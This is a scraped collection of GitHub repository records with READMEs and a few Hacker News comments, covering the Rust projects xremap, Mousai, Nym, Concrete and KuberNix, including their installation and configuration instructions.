[Emacs-like key remapping](example/emacs.yml), including the mark mode.\n* Trigger commands on key press/release events.\n* Use a non-modifier key as a virtual modifier key.\n\n## Installation\n\nDownload a binary from [Releases](https://github.com/k0kubun/xremap/releases).\n\nIf it doesn't work, please [install Rust](https://doc.rust-lang.org/cargo/getting-started/installation.html)\nand run one of the following commands:\n\n```bash\ncargo install xremap --features x11 # X11\ncargo install xremap --features gnome # GNOME Wayland\ncargo install xremap --features sway # Sway\ncargo install xremap --features hypr # Hyprland\ncargo install xremap # Others\n```\n\nYou may also need to install `libx11-dev` to run the `xremap` binary for X11.\n\n### Arch Linux\n\nIf you are on Arch Linux and X11, you can install [xremap-x11-bin](https://aur.archlinux.org/packages/xremap-x11-bin/) from AUR.\n\n### NixOS\n\nIf you are using NixOS, xremap can be installed and configured through a [flake](https://github.com/xremap/nix-flake/).\n\n## Usage\n\nWrite [a config file](#Configuration) directly, or generate it with\n[xremap-ruby](https://github.com/xremap/xremap-ruby) or [xremap-python](https://github.com/xremap/xremap-python).\nThen run:\n\n```\nsudo xremap config.yml\n```\n\n
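Because the config is JSON-compatible (see Concept above), you can also generate it from another program rather than writing it by hand, which is what the xremap-ruby and xremap-python wrappers do. A minimal sketch of our own in Rust using `serde_json` (the file name and mapping are arbitrary; this assumes, as YAML 1.2 parsers generally guarantee, that xremap's YAML loader accepts JSON):\n\n```rust\nuse serde_json::json;\n\nfn main() -> std::io::Result<()> {\n // A tiny modmap, equivalent to YAML `modmap: [{name: Global, remap: {CapsLock: Esc}}]`.\n let config = json!({\n \"modmap\": [\n { \"name\": \"Global\", \"remap\": { \"CapsLock\": \"Esc\" } }\n ]\n });\n std::fs::write(\"config.json\", serde_json::to_string_pretty(&config)?)?;\n Ok(())\n}\n```\n\n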
### Running xremap without sudo\n\nTo do so, your normal user should be able to use \`evdev\` and \`uinput\` without sudo.\nOn Ubuntu, this can be configured by running the following commands and rebooting your machine.\n\n\`\`\`bash\nsudo gpasswd -a YOUR_USER input\necho 'KERNEL==\"uinput\", GROUP=\"input\", TAG+=\"uaccess\"' | sudo tee /etc/udev/rules.d/input.rules\n\`\`\`\n\n#### Arch Linux\n\nThe following can be used on Arch.\n\n\`\`\`bash\nlsmod | grep uinput\n\`\`\`\nIf this module is not loaded, add it to \`/etc/modules-load.d/uinput.conf\`:\n\`\`\`bash\nuinput\n\`\`\`\nThen add the udev rule.\n\n\`\`\`bash\necho 'KERNEL==\"uinput\", GROUP=\"input\", MODE=\"0660\"' | sudo tee /etc/udev/rules.d/99-input.rules\n\`\`\`\n\n#### Other platforms\n\nOn other platforms, you might need to create an \`input\` group first\nand run \`echo 'KERNEL==\"event*\", NAME=\"input/%k\", MODE=\"660\", GROUP=\"input\"' | sudo tee /etc/udev/rules.d/input.rules\` as well.\n\nIf you do this, in some environments, \`--watch\` may fail to recognize new devices due to temporary permission issues.\nUsing \`sudo\` might be more useful in such cases.\n\n---\n\n
See the following instructions for your environment to make \`application\`-specific remapping work.\n\n### X11\n\nIf you use \`sudo\` to run \`xremap\`, you may need to run \`xhost +SI:localuser:root\` if you see \`No protocol specified\`.\n\n### GNOME Wayland\n\nInstall xremap's GNOME Shell extension from [this link](https://extensions.gnome.org/extension/5060/xremap/), switching it from OFF to ON.\n\n
If you use sudo to run xremap, also update \`/usr/share/dbus-1/session.conf\` as follows, and reboot your machine. (The XML policy lines of the original diff were lost in extraction; see the upstream xremap README for the exact change.)\n\n
\n\n## Configuration\nYour \`config.yml\` should look like this:\n\n\`\`\`yml\nmodmap:\n  - name: Except Chrome\n    application:\n      not: Google-chrome\n    remap:\n      CapsLock: Esc\nkeymap:\n  - name: Emacs binding\n    application:\n      only: Slack\n    remap:\n      C-b: left\n      C-f: right\n      C-p: up\n      C-n: down\n\`\`\`\n\nSee also: [example/config.yml](example/config.yml) and [example/emacs.yml](example/emacs.yml)\n\n### modmap\n\n\`modmap\` is for key-to-key remapping like xmodmap.\nNote that remapping a key to a modifier key, e.g. CapsLock to Control\\_L,\nis supported only in \`modmap\` since \`keymap\` handles modifier keys differently.\n\n\`\`\`yml\nmodmap:\n  - name: Name # Optional\n    exact_match: false # Optional, defaults to false\n    remap: # Required\n      # Replace a key with another\n      KEY_XXX: KEY_YYY # Required\n      # Dispatch different keys depending on whether you hold it or press it alone\n      KEY_XXX:\n        held: KEY_YYY # Required\n        alone: KEY_ZZZ # Required\n        alone_timeout_millis: 1000 # Optional\n      # Hook \`keymap\` action on key press/release events.\n      KEY_XXX:\n        press: { launch: [\"xdotool\", \"mousemove\", \"0\", \"7200\"] } # Required\n        release: { launch: [\"xdotool\", \"mousemove\", \"0\", \"0\"] } # Required\n    application: # Optional\n      not: [Application, ...]\n      # or\n      only: [Application, ...]\n\`\`\`\n\nFor \`KEY_XXX\` and \`KEY_YYY\`, use [these names](https://github.com/emberian/evdev/blob/1d020f11b283b0648427a2844b6b980f1a268221/src/scancodes.rs#L26-L572).\nYou can skip \`KEY_\` and the name is case-insensitive. So \`KEY_CAPSLOCK\`, \`CAPSLOCK\`, and \`CapsLock\` are the same thing.\nSome [custom aliases](src/config/key.rs) like \`SHIFT_R\`, \`CONTROL_L\`, etc. are provided.\n\nIf you specify a map containing \`held\` and \`alone\`, you can use the key for two purposes.\nThe key is considered \`alone\` if it's pressed and released within \`alone_timeout_millis\` (default: 1000)\nbefore any other key is pressed. Otherwise it's considered \`held\`.\n\n### keymap\n\n\`keymap\` is for remapping a sequence of key combinations to another sequence of key combinations or other actions.\n\n\`\`\`yml\nkeymap:\n  - name: Name # Optional\n    remap: # Required\n      # Key press -> Key press\n      MOD1-KEY_XXX: MOD2-KEY_YYY\n      # Sequence (MOD1-KEY_XXX, MOD2-KEY_YYY) -> Key press (MOD3-KEY_ZZZ)\n      MOD1-KEY_XXX:\n        remap:\n          MOD2-KEY_YYY: MOD3-KEY_ZZZ\n        timeout_millis: 200 # Optional. No timeout by default.\n      # Key press (MOD1-KEY_XXX) -> Sequence (MOD2-KEY_YYY, MOD3-KEY_ZZZ)\n      MOD1-KEY_XXX: [MOD2-KEY_YYY, MOD3-KEY_ZZZ]\n      # Execute a command\n      MOD1-KEY_XXX:\n        launch: [\"bash\", \"-c\", \"echo hello > /tmp/test\"]\n      # Let \`with_mark\` also press a Shift key (useful for Emacs emulation)\n      MOD1-KEY_XXX: { set_mark: true } # use { set_mark: false } to disable it\n      # Also press Shift only when { set_mark: true } is used before\n      MOD1-KEY_XXX: { with_mark: MOD2-KEY_YYY }\n      # The next key press will ignore keymap\n      MOD1-KEY_XXX: { escape_next_key: true }\n      # Set mode to configure Vim-like modal remapping\n      MOD1-KEY_XXX: { set_mode: default }\n    application: # Optional\n      not: [Application, ...]\n      # or\n      only: [Application, ...]\n    mode: default # Optional\ndefault_mode: default # Optional\n\`\`\`\n\nFor \`KEY_XXX\`, use [these names](https://github.com/emberian/evdev/blob/1d020f11b283b0648427a2844b6b980f1a268221/src/scancodes.rs#L26-L572).\nYou can skip \`KEY_\` and the name is case-insensitive. 
So \`KEY_CAPSLOCK\`, \`CAPSLOCK\`, and \`CapsLock\` are the same thing.\n\nFor the \`MOD1-\` part, the following prefixes can be used (also case-insensitive):\n\n* Shift: \`SHIFT-\`\n* Control: \`C-\`, \`CTRL-\`, \`CONTROL-\`\n* Alt: \`M-\`, \`ALT-\`\n* Windows: \`SUPER-\`, \`WIN-\`, \`WINDOWS-\`\n\nYou can use multiple prefixes like \`C-M-Shift-a\`.\nYou may also suffix them with \`_L\` or \`_R\` (case-insensitive) so that\nremapping is triggered only on a left or right modifier, e.g. \`Ctrl_L-a\`.\n\nIf you use \`virtual_modifiers\`, explained below, you can use them in the \`MOD1-\` part too.\n\n\`exact_match\` defines whether to use exact match when matching key presses. For\nexample, given a mapping of \`C-n: down\` and \`exact_match: false\` (default), if\nyou press C-Shift-n, it will automatically be remapped to\nShift-down, without you having to define a mapping for\nC-Shift-n, which you would have to do if you use \`exact_match: true\`.\n\n### application\n\n\`application\` can be used for both \`modmap\` and \`keymap\`, which allows you to specify application-specific remapping.\n\n\`\`\`yml\napplication:\n  not: Application\n  # or\n  not: [Application, ...]\n  # or\n  only: Application\n  # or\n  only: [Application, ...]\n\`\`\`\n\nThe application name can be specified as a normal string to exactly match the name,\nor a regex surrounded by \`/\`s like \`/application/\`.\n\nTo check the application names, you can use the following commands:\n\n#### X11\n\n\`\`\`\n$ wmctrl -x -l\n0x02800003 0 slack.Slack ubuntu-jammy Slack | general | ruby-jp\n0x05400003 0 code.Code ubuntu-jammy application.rs - xremap - Visual Studio Code\n\`\`\`\n\nYou may use the entire string of the third column (\`slack.Slack\`, \`code.Code\`),\nor just the last segment after \`.\` (\`Slack\`, \`Code\`).\n\n#### GNOME Wayland\n\n\`\`\`\nbusctl --user call org.gnome.Shell /com/k0kubun/Xremap com.k0kubun.Xremap WMClass\n\`\`\`\n\n#### Sway\n\n\`\`\`\nswaymsg -t get_tree\n\`\`\`\n\nLocate \`app_id\` in the output.\n\n#### application-specific key overrides\n\nSometimes you want to define a generic key map that is available in all applications, but give specific keys in that map their own definition in specific applications. You can do this by putting the generic map at the bottom of the config, after any specific overrides, as follows.\n\n\`\`\`yml\n# Emacs-style word-forward and word-back\nkeymap:\n  - name: override to make libreoffice-writer go to end of word but before final space like emacs\n    application:\n      only: libreoffice-writer\n    remap:\n      Alt-f: [right, C-right, left]\n  - name: generic for all apps\n    remap:\n      Alt-f: C-right\n      Alt-b: C-left\n\`\`\`\n\nNote how Alt-f and Alt-b work in all apps, but the definition of Alt-f is slightly different in LibreOffice Writer. When that app is active, the first definition overrides the second definition; but for any other app, only the second definition is found. This is because xremap uses the first matching definition that it finds.\n\n### virtual\\_modifiers\n\nYou can declare keys that should act like a modifier.\n\n\`\`\`yml\nvirtual_modifiers:\n  - CapsLock\nkeymap:\n  - remap:\n      CapsLock-i: Up\n      CapsLock-j: Left\n      CapsLock-k: Down\n      CapsLock-l: Right\n\`\`\`\n\n### keypress_delay_ms\n\nSome applications have trouble understanding synthesized key events, especially on\nWayland. 
\`keypress_delay_ms\` can be used to work around the issue.\nSee [#179](https://github.com/k0kubun/xremap/issues/179) for the details.\n\n## License\n\n\`xremap\` is available as open source under the terms of the [MIT License](https://opensource.org/licenses/MIT).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "SeaDve/Mousai", "link": "https://github.com/SeaDve/Mousai", "tags": ["gnome", "shazam-like", "linux"], "stars": 681, "description": "Identify songs in seconds", "lang": "Rust", "repo_lang": "", "readme": "
# Mousai\n\nIdentify songs in seconds\n
\n\nDiscover songs you are aching to know with an easy-to-use interface.\n\nMousai is a simple application that can identify songs, similar to Shazam. Just\nclick the listen button, and then wait a few seconds. It will magically return\nthe title and artist of that song!\n\nNote: This uses the API of audd.io, so it is necessary to log in to their site to get more trials.\n\nWhy will you love Mousai?\n* \ud83c\udfb5 Identify the title and artist of a song within seconds.\n* \ud83c\udf99\ufe0f Use your microphone or audio from the desktop.\n* \ud83c\udfb8 Store the identified song, including the album art, in history.\n* \ud83c\udfbc Preview the identified song with the native player.\n* \ud83c\udf10 Browse and listen to the song from different providers.\n* \ud83d\udcf1 Easy-to-use user interface.\n* \u2328\ufe0f User-friendly keyboard shortcuts.\n\n## \ud83c\udf08 AudD\n\nAudD is a music recognition API that makes Mousai possible. For more information,\nyou can check their [Privacy Policy](https://audd.io/privacy/) and [Terms of Service](https://audd.io/terms/).\n\n\n## \ud83c\udfd7\ufe0f Building from source\n\n### GNOME Builder\nGNOME Builder is the environment used for developing this application. It can use Flatpak manifests to create a consistent building and running environment cross-distro. Thus, it is highly recommended you use it.\n\n1. Download [GNOME Builder](https://flathub.org/apps/details/org.gnome.Builder).\n2. In Builder, click the \"Clone Repository\" button at the bottom, using \`https://github.com/SeaDve/Mousai.git\` as the URL.\n3. Click the build button at the top once the project is loaded.\n\n### Meson\n\`\`\`\ngit clone https://github.com/SeaDve/Mousai.git\ncd Mousai\nmeson _build --prefix=/usr/local\nninja -C _build install\n\`\`\`\n\n\n## \ud83d\ude4c Help translate Mousai\nYou can help translate Mousai into your native language. If you find any typos\nor think you can improve a translation, you can use the [Weblate](https://hosted.weblate.org/engage/kooha/) platform.\n\n\n## \u2615 Support me and the project\n\nMousai is free and will always be free for everyone to use. If you like the project and\nwould like to support and fund it, you may donate through [Liberapay](https://liberapay.com/SeaDve/).\n\n\n## \ud83d\udc9d Acknowledgment\n\nSpecial thanks to [AudD's API](https://audd.io/) and [contributors](https://github.com/SeaDve/Mousai/graphs/contributors)\nfor making Mousai possible. Also, a warm thanks to the project's [translators](https://hosted.weblate.org/engage/kooha/).\n", "readme_type": "markdown", "hn_comments": "This is just a frontend for AudD, no? Nothing wrong with that, but I got really excited for a moment to see open source, fully local music recognition software.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nymtech/nym", "link": "https://github.com/nymtech/nym", "tags": [], "stars": 681, "description": "Nym provides strong network-level privacy against sophisticated end-to-end attackers, and anonymous transactions using blinded, re-randomizable, decentralized credentials.", "lang": "Rust", "repo_lang": "", "readme": "\n\n## The Nym Privacy Platform\n\nThe platform is composed of multiple Rust crates. Top-level executable binary crates include:\n\n* nym-mixnode - shuffles [Sphinx](https://github.com/nymtech/sphinx) packets together to provide privacy against network-level attackers.\n* nym-client - an executable which you can build into your own applications. 
Use it for interacting with Nym nodes.\n* nym-socks5-client - a Socks5 proxy you can run on your machine and use with existing applications.\n* nym-gateway - acts sort of like a mailbox for mixnet messages, which removes the need for direct delivery to potentially offline or firewalled devices.\n* nym-network-monitor - sends packets through the full system to check that they are working as expected, and stores node uptime histories as the basis of a rewards system (\"mixmining\" or \"proof-of-mixing\").\n* nym-explorer - a (projected) block explorer and (existing) mixnet viewer.\n* nym-wallet - a desktop wallet implemented using the [Tauri](https://tauri.studio/en/docs/about/intro) framework. \n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg?style=for-the-badge)](https://opensource.org/licenses/Apache-2.0)\n[![Build Status](https://img.shields.io/github/workflow/status/nymtech/nym/Continuous%20integration/develop?style=for-the-badge&logo=github-actions)](https://github.com/nymtech/nym/actions?query=branch%3Adevelop)\n\n\n### Building\n\nPlatform build instructions are available on [our docs site](https://nymtech.net/docs/stable/run-nym-nodes/build-nym).\nWallet build instructions are also available on [our docs site](https://nymtech.net/docs/stable/nym-apps/wallet#for-developers).\n\n### Developing\n\nThere's a \`.env.sample-dev\` file provided which you can rename to \`.env\` if you want convenient logging, backtrace, or other environment variables pre-set. The \`.env\` file is ignored so you don't need to worry about checking it in.\n\nFor TypeScript components, please see [ts-packages](./ts-packages).\n\n### Developer chat\n\nYou can chat to us in [Keybase](https://keybase.io). Download their chat app, then click **Teams -> Join a team**. Type **nymtech.friends** into the team name and hit **continue**. For general chat, hang out in the **#general** channel. Our development takes place in the **#dev** channel. Node operators should be in the **#node-operators** channel.\n\n### Rewards\n\nNode, node operator and delegator rewards are determined according to the principles laid out in section 6 of the [Nym Whitepaper](https://nymtech.net/nym-whitepaper.pdf). Below is a TLDR of the variables involved in calculating the epoch rewards; the symbol images from the original table did not survive extraction, so only the definitions are listed. The initial reward pool is set to 250 million Nym, making the circulating supply 750 million Nym.\n\n- global share of rewards available, starts at 2% of the reward pool.\n- node reward for mixnode \`i\`.\n- ratio of total node stake (node bond + all delegations) to the token circulating supply.\n- ratio of stake the operator has pledged to their node to the token circulating supply.\n- fraction of total effort undertaken by node \`i\`, set to \`1/k\`.\n- number of nodes stakeholders are incentivised to create, set by the validators, a matter of governance. Currently determined by the \`reward set\` size, and set to 720 in testnet Sandbox.\n- Sybil attack resistance parameter - the higher this parameter is set, the stronger the reduction in competitiveness gets for a Sybil attacker.\n- declared profit margin of operator \`i\`, defaults to 10%.\n- uptime of node \`i\`, scaled to 0 - 1, for the rewarding epoch.\n- cost of operating node \`i\` for the duration of the rewarding epoch, set to 40 NYMT.\n\nFrom these variables, the whitepaper derives the reward for node \`i\`, the amount credited to its operator, and the amount received by a delegate with stake \`s\` (where \`s'\` is \`s\` scaled over the total token circulating supply); the formula images did not survive extraction, so see section 6 of the whitepaper for the exact equations.\n\n### Licensing and copyright information\n\nThis program is available as open source under the terms of the Apache 2.0 license. However, some elements are being licensed under CC0-1.0 and MIT. For accurate information, please check individual files.\n\n", "readme_type": "markdown", "hn_comments": "Article is two and a half years old. Anyone have an update on this project?I'm curious how they mitigate Sybil attacks. There doesn't seem to be any elaboration on that point, and any claim to a technique by which to mitigate the problem with no centralization is a very strong claim and needs some type of citation.I think to some extent, the Tor network coordinators are needed to prevent correlation attacks, are they not?I'll keep an eye on Nym, but I am pretty skeptical of any network that relies on a cryptocurrency scheme to operate, especially one with staking like Lokinet. Hypothetically it could work as an incentive structure, but the probabilistic nature of privacy schemes don't bode well, and I think the incentives for HODLing usually displace any actual interest in the network as a service.Additionally, I have a hard time imagining Tor or I2P being displaced due to network effects, especially if it requires purchasing cryptocurrency, which is already pretty difficult.Although the original title is a little clickbait and not exactly correct, this article written by Ania M. Piotrowska, one of Nym\u2019s main researcher, explained in details what are the privacy properties you need against state level mass surveillance.The importance of this article is to see a privacy project introspectively admitting its current limitation. In Nym\u2019s case, it still doesn\u2019t have hidden service, sender anonymity and receiver anonymity. This is the level of transparency we want to see from any privacy project.Having flaws or limitations are okay, but not communicating them with users while advertising itself as a privacy project is just dishonest. I hope to see more articles like this from other privacy projects.Nym explained its ambition to achieve much stronger privacy properties under much stronger threat model. Until then, they can truly claim to protect privacy against state surveillance.Free Software community implementation stemming from the same research: https://katzenpost.mixnetworks.org/For a moment I thought it was the Python documentation tool named Sphinx. 
Took me a while to understand it is a payload format for a blockchain.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zama-ai/concrete", "link": "https://github.com/zama-ai/concrete", "tags": ["fhe", "tfhe", "homomorphic-encryption", "homomorphic-encryption-library", "paillier", "privacy", "gdpr", "cryptography", "rust"], "stars": 681, "description": "Concrete: State-of-the-art TFHE library for boolean and integer arithmetics.", "lang": "Rust", "repo_lang": "", "readme": "
# Concrete\n
\n\n> **Warning**\n>\n> The Concrete repository is about to transition from our original TFHE library to our TFHE compiler.\n> For those seeking a TFHE library in Rust, we recommend switching to [TFHE-rs](https://github.com/zama-ai/tfhe-rs).\n\nThe \`concrete\` ecosystem is a set of crates that implements Zama's variant of\n[TFHE](https://eprint.iacr.org/2018/421.pdf). In a nutshell,\n[fully homomorphic encryption (FHE)](https://en.wikipedia.org/wiki/Homomorphic_encryption) allows\nyou to perform computations over encrypted data, allowing you to implement Zero Trust services.\n\nConcrete is based on the\n[Learning With Errors (LWE)](https://cims.nyu.edu/~regev/papers/lwesurvey.pdf) and the\n[Ring Learning With Errors (RLWE)](https://eprint.iacr.org/2012/230.pdf) problems, which are well\nstudied cryptographic hardness assumptions believed to be secure even against quantum computers.\n\n## Links\n\n- [documentation](https://docs.zama.ai/concrete)\n- [whitepaper](http://whitepaper.zama.ai)\n- [community website](https://community.zama.ai)\n\n## Concrete crates\n\nConcrete is implemented using the [Rust Programming language](https://www.rust-lang.org/), which\nallows very fast, yet very secure implementations.\n\nThe ecosystem is composed of several crates (packages in the Rust language).\nThe crates are split into 2 repositories:\n\n- The \`concrete\` repository which contains crates intended to be more approachable by\nnon-cryptographers.\n- The [concrete-core](https://github.com/zama-ai/concrete-core) repository which contains the crates\n implementing the low level cryptographic primitives.\n\nThe crates within this repository are:\n- [\`concrete\`](concrete): A high-level library, useful to cryptographers who want to quickly\n implement homomorphic applications, without having to understand the details of the\n implementation.\n- [\`concrete-boolean\`](concrete-boolean): A high-level library, implementing homomorphic Boolean gates, making it easy\n to run any kind of circuit over encrypted data.\n- [\`concrete-shortint\`](concrete-shortint): A high-level library, implementing operations on short integers (about 1 to 4 bits).\n- [\`concrete-integer\`](concrete-integer): A high-level library, implementing operations on integers, constructed on top of short integers for values in about 4 to 16 bits.\n\n## Installation\n\nAs \`concrete\` relies on \`concrete-core\`, \`concrete\` is only supported on \`x86_64 Linux\` and \`x86_64 macOS\`.\nWindows users can use \`concrete\` through the \`WSL\`. For installation instructions see [Install.md](INSTALL.md)\nor [documentation](https://docs.zama.ai/concrete).\n\n
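As a quick look at the \`concrete-boolean\` gate API mentioned above, here is a minimal sketch before the full walkthrough below. It is based on the crate's published examples rather than verified against a specific release, so treat the exact names as assumptions and check the crate documentation for your version:\n\n\`\`\`rust\n// Minimal sketch of homomorphic Boolean gates with concrete-boolean\n// (names assumed from the crate's published examples).\nuse concrete_boolean::gen_keys;\n\nfn main() {\n    // Client side: generate the secret (client) key and the evaluation\n    // (server) key, then encrypt two Booleans.\n    let (client_key, server_key) = gen_keys();\n    let ct_a = client_key.encrypt(true);\n    let ct_b = client_key.encrypt(false);\n\n    // Server side: evaluate a gate homomorphically, without decrypting.\n    let ct_xor = server_key.xor(&ct_a, &ct_b);\n\n    // Client side: decrypt the result.\n    assert_eq!(client_key.decrypt(&ct_xor), true);\n}\n\`\`\`\n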
\n## Getting Started\n\nHere is a simple example of an encrypted addition between two encrypted 8-bit variables. For more\ninformation please read the [documentation](https://docs.zama.ai/concrete).\n\n\`\`\`rust\nuse concrete::{ConfigBuilder, generate_keys, set_server_key, FheUint8};\nuse concrete::prelude::*;\n\nfn main() {\n    let config = ConfigBuilder::all_disabled()\n        .enable_default_uint8()\n        .build();\n\n    let (client_key, server_key) = generate_keys(config);\n\n    set_server_key(server_key);\n\n    let clear_a = 27u8;\n    let clear_b = 128u8;\n\n    let a = FheUint8::encrypt(clear_a, &client_key);\n    let b = FheUint8::encrypt(clear_b, &client_key);\n\n    let result = a + b;\n\n    let decrypted_result: u8 = result.decrypt(&client_key);\n\n    let clear_result = clear_a + clear_b;\n\n    assert_eq!(decrypted_result, clear_result);\n}\n\`\`\`\n\n## Contributing\n\nThere are two ways to contribute to Concrete:\n\n- you can open issues to report bugs or typos and to suggest new ideas\n- you can ask to become an official contributor by emailing [hello@zama.ai](mailto:hello@zama.ai).\n(becoming an approved contributor involves signing our Contributor License Agreement (CLA))\n\nOnly approved contributors can send pull requests, so please make sure to get in touch before you do!\n\n## Citing Concrete\n\nTo cite Concrete in academic papers, please use the following entry:\n\n\`\`\`text\n@inproceedings{WAHC:CJLOT20,\n  title={CONCRETE: Concrete Operates oN Ciphertexts Rapidly by Extending TfhE},\n  author={Chillotti, Ilaria and Joye, Marc and Ligier, Damien and Orfila, Jean-Baptiste and Tap, Samuel},\n  booktitle={WAHC 2020--8th Workshop on Encrypted Computing \\& Applied Homomorphic Cryptography},\n  volume={15},\n  year={2020}\n}\n\`\`\`\n\n## Credits\n\nThis library uses several dependencies and we would like to thank the contributors of those\nlibraries.\n\nWe thank [Daniel May](https://gitlab.com/danieljrmay) for supporting this project and donating the\n\`concrete\` crate.\n\n## License\n\nThis software is distributed under the BSD-3-Clause-Clear license. If you have any questions,\nplease contact us at \`hello@zama.ai\`.\n\n## Disclaimers\n\n### Security Estimation\n\nSecurity estimation, in this repository, used to be based on\nthe [LWE Estimator](https://bitbucket.org/malb/lwe-estimator/src/master/),\nwith \`reduction_cost_model = BKZ.sieve\`.\nWe are currently moving to the [Lattice Estimator](https://github.com/malb/lattice-estimator)\nwith \`red_cost_model = reduction.RC.BDGL16\`.\n\nWhen a new update is published in the Lattice Estimator, we update parameters accordingly.\n\n### Side-Channel Attacks\n\nMitigations for side-channel attacks have not yet been implemented in Concrete,\nand will be released in upcoming versions.\n", "readme_type": "markdown", "hn_comments": "I've been following these fellows for a bit, and haven't seen them mentioned here. This is a really fascinating product. What do data scientists and ML engineers think of this sort of tech breaking into the market?Last I checked FHE was computationally infeasible for any realistic work load. 
Has that changed?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "saschagrunert/kubernix", "link": "https://github.com/saschagrunert/kubernix", "tags": ["nix", "kubernetes", "rust", "kubernetes-setup", "nix-shell", "kubernetes-cluster", "kubernetes-deployment", "kubernetes-development"], "stars": 678, "description": "Single dependency Kubernetes clusters for local testing, experimenting and development", "lang": "Rust", "repo_lang": "", "readme": "\n\n[![CircleCI](https://circleci.com/gh/saschagrunert/kubernix.svg?style=shield)](https://circleci.com/gh/saschagrunert/kubernix)\n[![Docs master](https://img.shields.io/badge/doc-master-orange.svg)](https://saschagrunert.github.io/kubernix/doc/kubernix/index.html)\n[![Docs release](https://docs.rs/kubernix/badge.svg)](https://docs.rs/kubernix)\n[![Coverage](https://codecov.io/gh/saschagrunert/kubernix/branch/master/graph/badge.svg)](https://codecov.io/gh/saschagrunert/kubernix)\n[![Dependencies](https://deps.rs/repo/github/saschagrunert/kubernix/status.svg)](https://deps.rs/repo/github/saschagrunert/kubernix)\n[![Crates.io](https://img.shields.io/crates/v/kubernix.svg)](https://crates.io/crates/kubernix)\n[![License MIT](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/saschagrunert/kubernix/blob/master/LICENSE)\n\n## Kubernetes development cluster bootstrapping with Nix packages\n\nThis project aims to provide **single dependency** [Kubernetes][1] clusters\nfor local testing, experimenting and development purposes.\n\n[1]: https://kubernetes.io\n\nMoving pictures are worth more than thousand words, so here is a short demo:\n\n![demo](.github/kubernix.svg)\n\n### Nix?\n\nHave you ever heard about [Nix][2], the functional package manager?\n\nIn case you haven't, don\u2019t worry \u2013 the important thing is that it provides all the third-party\ndependencies needed for this project, pinned to a dedicated version. This guarantees stable,\nreproducible installations.\n\n[2]: https://nixos.org/nix\n\nKuberNix itself is a Rusty helper program, which takes care of bootstrapping\nthe Kubernetes cluster, passing the right configuration parameters around and\nkeeping track of the running processes.\n\n### What is inside\n\nThe following technology stack is currently being used:\n\n| Application | Version |\n| --------------- | ------------ |\n| cfssl | v1.5.0 |\n| cni-plugins | v0.9.0 |\n| conmon | v2.0.25 |\n| conntrack-tools | v1.4.6 |\n| cri-o-wrapper | v1.20.0 |\n| cri-tools | v1.20.0 |\n| etcd | v3.3.25 |\n| iproute2 | v5.10.0 |\n| iptables | v1.8.6 |\n| kmod | v27 |\n| kubectl | v1.19.5 |\n| kubernetes | v1.19.5 |\n| nss-cacert | v3.60 |\n| podman-wrapper | v2.2.1 |\n| runc | v1.0.0-rc92 |\n| socat | v1.7.4.1 |\n| sysctl | v1003.1.2008 |\n| util-linux | v2.36.1 |\n\nSome other tools are not explicitly mentioned here, because they are no\nfirst-level dependencies.\n\n### Single Dependency\n\n#### With Nix\n\nAs already mentioned, there is only one single dependency needed to run this\nproject: **Nix**. To setup Nix, simply run:\n\n```shell\n$ curl https://nixos.org/nix/install | sh\n```\n\nPlease make sure to follow the instructions output by the script.\n\n#### With the Container Runtime of your Choice\n\nIt is also possible to run KuberNix in the container runtime of your choice. To\ndo this, simply grab the latest image from [`saschagrunert/kubernix`][40].\nPlease note that running KuberNix inside a container image requires to run\n`privileged` mode and `host` networking. 
For example, we can run KuberNix with\n[podman][41] like this:\n\n[40]: https://cloud.docker.com/u/saschagrunert/repository/docker/saschagrunert/kubernix\n[41]: https://github.com/containers/libpod\n\n```\n$ sudo podman run \\\n --net=host \\\n --privileged \\\n -it docker.io/saschagrunert/kubernix:latest\n```\n\n### Getting Started\n\n#### Cluster Bootstrap\n\nTo bootstrap your first cluster, download one of the latest [release binaries][18] or\nbuild the application via:\n\n[18]: https://github.com/saschagrunert/kubernix/releases/latest\n\n```shell\n$ make build-release\n```\n\nThe binary should now be available in the `target/release/kubernix` directory of\nthe project. Alternatively, install the application via `cargo install kubernix`.\n\nAfter the successful binary retrieval, start KuberNix by running it as `root`:\n\n```\n$ sudo kubernix\n```\n\nKuberNix will now take care that the Nix environment gets correctly setup,\ndownloads the needed binaries and starts the cluster. Per default it will create\na directory called `kubernix-run` in the current path which contains all necessary\ndata for the cluster.\n\n#### Shell Environment\n\nIf everything went fine, you should be dropped into a new shell session,\nlike this:\n\n```\n[INFO ] Everything is up and running\n[INFO ] Spawning interactive shell\n[INFO ] Please be aware that the cluster stops if you exit the shell\n>\n```\n\nNow you can access your cluster via tools like `kubectl`:\n\n```\n> kubectl get pods --all-namespaces\nNAMESPACE NAME READY STATUS RESTARTS AGE\nkube-system coredns-85d84dd694-xz997 1/1 Running 0 102s\n```\n\nAll configuration files have been written to the target directory, which is now\nthe current one:\n\n```\n> ls -1\napiserver/\ncontrollermanager/\ncoredns/\ncrio/\nencryptionconfig/\netcd/\nkubeconfig/\nkubelet/\nkubernix.env\nkubernix.toml\nnix/\npki/\npolicy.json\nproxy/\nscheduler/\n```\n\nFor example, the log files for the different running components are now\navailable within their corresponding directory:\n\n```\n> ls -1 **.log\napiserver/kube-apiserver.log\ncontrollermanager/kube-controller-manager.log\ncrio/crio.log\netcd/etcd.log\nkubelet/kubelet.log\nproxy/kube-proxy.log\nscheduler/kube-scheduler.log\n```\n\nIf you want to spawn an additional shell session, simply run `kubernix shell` in\nthe same directory as where the initial bootstrap happened.\n\n```\n$ sudo kubernix shell\n[INFO kubernix] Spawning new kubernix shell in 'kubernix-run'\n> kubectl run --generator=run-pod/v1 --image=alpine -it alpine sh\nIf you don't see a command prompt, try pressing enter.\n/ #\n```\n\nThis means that you can spawn as many shells as you want to.\n\n#### Cleanup\n\nThe whole cluster gets automatically destroyed if you exit the shell session\nfrom the initial process:\n\n```\n> exit\n[INFO ] Cleaning up\n```\n\nPlease note that the directory where all the data is stored is not being\nremoved after the exit of KuberNix. This means that you\u2019re still able to\naccess the log and configuration files for further processing. If you start\nthe cluster again, then the cluster files will be reused. This is especially\nhandy if you want to test configuration changes.\n\n#### Restart\n\nIf you start KuberNix again in the same run directory, then it will re-use the\nconfiguration during the cluster bootstrapping process. This means that you\ncan modify all data inside the run root for testing and debugging purposes. 
